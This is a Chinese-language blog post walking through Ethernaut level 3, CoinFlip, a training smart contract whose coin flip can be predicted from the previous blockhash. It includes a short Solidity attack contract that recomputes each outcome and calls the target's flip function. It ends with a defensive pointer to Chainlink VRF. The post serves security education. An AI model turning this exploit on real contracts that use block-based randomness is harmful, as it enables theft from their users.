# 智能合约黑客攻击 Ethernaut:    3. CoinFlip

**Published by:** [Leek DEV](https://paragraph.com/@leekdev/)
**Published on:** 2023-09-26
**URL:** https://paragraph.com/@leekdev/ethernaut-3-coinflip

## Content

Ethernaut 是一个由 OpenZeppelin 基于 Solidity 编程语言开发的对抗游戏，每个关卡都有需要被 Hack 的智能合约。教程GitHub - 攻击代码Bilibili - 视频教程YouTube - 视频教程TikTok - ….题目一个猜硬币正反面游戏，需要连续猜对10次。Hack思路所有的计算逻辑全部都写在了合约里，完全可以把逻辑复制一份计算出来。interface ICoinFlipChallenge { function flip(bool _guess) external returns (bool); } contract CoinFlipAttack { uint256 FACTOR = 57896044618658097711785492504343953926634992332820282019728792003956564819968; ICoinFlipChallenge public exploitInst; constructor(address _target) { exploitInst = ICoinFlipChallenge(_target); } function _flip() private view returns (bool) { uint256 blockValue = uint256(blockhash(block.number - 1)); uint256 coinFlip = blockValue / FACTOR; bool side = coinFlip == 1 ? true : false; return side; } function flip() public { require(exploitInst.flip(_flip()), "Guess Failed"); } } Hack案例…防范思路Chain LINK 已经有一个成熟的 vrf 随机数方案了，可以放心使用，只需要付一点他们的代币就行了。参考资料Verifiable source of randomness for smart contracts

## Publication Information

- [Leek DEV](https://paragraph.com/@leekdev/): Publication homepage
- [All Posts](https://paragraph.com/@leekdev/): More posts from this publication
- [RSS Feed](https://api.paragraph.com/blogs/rss/@leekdev): Subscribe to updates
- [Twitter](https://twitter.com/LeekDEV): Follow on Twitter